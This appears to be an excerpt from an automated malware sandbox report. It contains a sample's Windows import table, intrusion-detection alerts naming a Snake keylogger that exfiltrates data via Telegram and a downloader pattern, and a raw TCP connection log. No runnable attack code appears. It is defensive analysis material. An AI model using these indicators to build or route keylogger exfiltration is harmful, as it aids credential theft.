                                                                                                          USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                          ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-12-17T03:29:40.007753+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736142.250.186.174443TCP
                                                                                                          2024-12-17T03:29:47.537292+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.130.080TCP
                                                                                                          2024-12-17T03:29:55.662432+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.130.080TCP
                                                                                                          2024-12-17T03:29:57.845766+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449742149.154.167.220443TCP
                                                                                                          2024-12-17T03:29:59.302938+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449748193.122.130.080TCP
                                                                                                          2024-12-17T03:30:01.216537+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449749149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:12.490733+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449755193.122.130.080TCP
                                                                                                          2024-12-17T03:30:14.445035+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449785149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:22.223697+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449803149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:25.891903+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449815149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:30.827003+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449827149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:35.275690+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449839149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:38.521348+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449850149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:44.060895+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449863149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:48.646565+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449875149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:51.952053+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449885149.154.167.220443TCP
                                                                                                          2024-12-17T03:30:56.279726+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449898149.154.167.220443TCP
                                                                                                          2024-12-17T03:31:00.594692+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449907149.154.167.220443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 17, 2024 03:29:37.969741106 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:37.969830990 CET44349736142.250.186.174192.168.2.4
                                                                                                          Dec 17, 2024 03:29:37.969939947 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:37.984253883 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:37.984292984 CET44349736142.250.186.174192.168.2.4
                                                                                                          Dec 17, 2024 03:29:39.383753061 CET44349736142.250.186.174192.168.2.4
                                                                                                          Dec 17, 2024 03:29:39.383860111 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:39.384829044 CET44349736142.250.186.174192.168.2.4
                                                                                                          Dec 17, 2024 03:29:39.384933949 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:39.442950964 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:39.442996979 CET44349736142.250.186.174192.168.2.4
                                                                                                          Dec 17, 2024 03:29:39.444035053 CET44349736142.250.186.174192.168.2.4
                                                                                                          Dec 17, 2024 03:29:39.444129944 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:39.449559927 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:39.491362095 CET44349736142.250.186.174192.168.2.4
                                                                                                          Dec 17, 2024 03:29:40.007719040 CET44349736142.250.186.174192.168.2.4
                                                                                                          Dec 17, 2024 03:29:40.007865906 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:40.008379936 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:40.008465052 CET44349736142.250.186.174192.168.2.4
                                                                                                          Dec 17, 2024 03:29:40.008574963 CET49736443192.168.2.4142.250.186.174
                                                                                                          Dec 17, 2024 03:29:40.259785891 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:40.259881973 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:40.262403965 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:40.262403965 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:40.262480974 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:41.675635099 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:41.675743103 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:41.680320978 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:41.680335999 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:41.680752993 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:41.680823088 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:41.681176901 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:41.723350048 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.073502064 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.073599100 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.084229946 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.084335089 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.103095055 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.103190899 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.193089962 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.193209887 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.193242073 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.193310022 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.265136957 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.265234947 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.268793106 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.268865108 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.268917084 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.268985987 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.276293993 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.276374102 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.276458025 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.276509047 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.283796072 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.283871889 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.283953905 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.284014940 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.291470051 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.291543007 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.298794031 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.298890114 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.298923969 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.298974991 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.306292057 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.306364059 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.306401968 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.306461096 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.313798904 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.313853979 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.313905001 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.313958883 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.321310043 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.321398973 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.328828096 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.328948975 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.328980923 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.329041004 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.334816933 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.334882021 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.334939003 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.335002899 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.340954065 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.341029882 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.341057062 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.341131926 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.346820116 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.346880913 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.346935987 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.346995115 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.352981091 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.353061914 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.358918905 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.358988047 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.359060049 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.359121084 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.457326889 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.457482100 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.457520008 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.457595110 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.459531069 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.459585905 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.464039087 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.464122057 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.464147091 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.464210033 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.468579054 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.468653917 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.468693018 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.468755960 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.473068953 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.473148108 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.473180056 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.473242044 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.473256111 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.473313093 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.477385044 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.477461100 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.477534056 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.477590084 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.481618881 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.481690884 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.485553980 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.485618114 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.485634089 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.485696077 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.489556074 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.489644051 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.489664078 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.489726067 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.493401051 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.493501902 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.497279882 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.497340918 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.497355938 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.497416973 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.501105070 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.501192093 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.501250982 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.501302958 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.504987001 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.505074978 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.505143881 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.505208969 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.508873940 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.508938074 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.508981943 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.509031057 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.512917995 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.512994051 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.516653061 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.516746044 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.516763926 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.516830921 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.520462990 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.520529032 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.520589113 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.520747900 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.524343014 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.524442911 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.524524927 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.524584055 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.528201103 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.528284073 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.528299093 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.528363943 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.528439999 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.528496027 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.528507948 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.528532028 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.528534889 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.528558016 CET44349737142.250.185.193192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.528583050 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.528636932 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:44.528636932 CET49737443192.168.2.4142.250.185.193
                                                                                                          Dec 17, 2024 03:29:45.072364092 CET4973880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:45.192269087 CET8049738193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:45.192635059 CET4973880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:45.192862034 CET4973880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:45.312691927 CET8049738193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:47.162818909 CET8049738193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:47.167257071 CET4973880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:47.287158012 CET8049738193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:47.490616083 CET8049738193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:47.537292004 CET4973880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:48.112984896 CET49739443192.168.2.4188.114.97.3
                                                                                                          Dec 17, 2024 03:29:48.113084078 CET44349739188.114.97.3192.168.2.4
                                                                                                          Dec 17, 2024 03:29:48.113399029 CET49739443192.168.2.4188.114.97.3
                                                                                                          Dec 17, 2024 03:29:48.116552114 CET49739443192.168.2.4188.114.97.3
                                                                                                          Dec 17, 2024 03:29:48.116586924 CET44349739188.114.97.3192.168.2.4
                                                                                                          Dec 17, 2024 03:29:49.385118008 CET44349739188.114.97.3192.168.2.4
                                                                                                          Dec 17, 2024 03:29:49.385481119 CET49739443192.168.2.4188.114.97.3
                                                                                                          Dec 17, 2024 03:29:49.389822006 CET49739443192.168.2.4188.114.97.3
                                                                                                          Dec 17, 2024 03:29:49.389878035 CET44349739188.114.97.3192.168.2.4
                                                                                                          Dec 17, 2024 03:29:49.390455961 CET44349739188.114.97.3192.168.2.4
                                                                                                          Dec 17, 2024 03:29:49.394669056 CET49739443192.168.2.4188.114.97.3
                                                                                                          Dec 17, 2024 03:29:49.435364962 CET44349739188.114.97.3192.168.2.4
                                                                                                          Dec 17, 2024 03:29:49.825448036 CET44349739188.114.97.3192.168.2.4
                                                                                                          Dec 17, 2024 03:29:49.825603008 CET44349739188.114.97.3192.168.2.4
                                                                                                          Dec 17, 2024 03:29:49.825896978 CET49739443192.168.2.4188.114.97.3
                                                                                                          Dec 17, 2024 03:29:49.839792013 CET49739443192.168.2.4188.114.97.3
                                                                                                          Dec 17, 2024 03:29:55.298147917 CET4973880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:55.417994976 CET8049738193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:55.619884968 CET8049738193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:55.662431955 CET4973880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:55.851809978 CET49742443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:55.851885080 CET44349742149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:55.851969957 CET49742443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:55.852957964 CET49742443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:55.852989912 CET44349742149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:57.230140924 CET44349742149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:57.230242014 CET49742443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:57.232974052 CET49742443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:57.232986927 CET44349742149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:57.233393908 CET44349742149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:57.235496044 CET49742443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:57.279352903 CET44349742149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:57.279439926 CET49742443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:57.279453993 CET44349742149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:57.845920086 CET44349742149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:57.846120119 CET44349742149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:57.846206903 CET49742443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:57.846611023 CET49742443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:58.029243946 CET4973880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:58.030225039 CET4974880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:58.149379015 CET8049738193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:58.149580956 CET4973880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:58.149970055 CET8049748193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:58.150095940 CET4974880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:58.150279999 CET4974880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:29:58.270035982 CET8049748193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:59.247704983 CET8049748193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:29:59.249067068 CET49749443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:59.249119043 CET44349749149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:59.249206066 CET49749443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:59.249795914 CET49749443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:29:59.249816895 CET44349749149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:29:59.302937984 CET4974880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:00.619409084 CET44349749149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:00.620876074 CET49749443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:00.620910883 CET44349749149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:00.620976925 CET49749443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:00.621000051 CET44349749149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:01.216675043 CET44349749149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:01.216893911 CET44349749149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:01.216973066 CET49749443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:01.217253923 CET49749443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:01.221014977 CET4974880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:01.221959114 CET4975580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:01.341487885 CET8049748193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:01.341578960 CET4974880192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:01.341742039 CET8049755193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:01.341849089 CET4975580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:01.341950893 CET4975580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:01.461704969 CET8049755193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:12.433202982 CET8049755193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:12.436273098 CET49785443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:12.436366081 CET44349785149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:12.436465025 CET49785443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:12.436709881 CET49785443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:12.436739922 CET44349785149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:12.490732908 CET4975580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:13.810359955 CET44349785149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:13.812324047 CET49785443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:13.812371016 CET44349785149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:13.812586069 CET49785443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:13.812609911 CET44349785149.154.167.220192.168.2.4
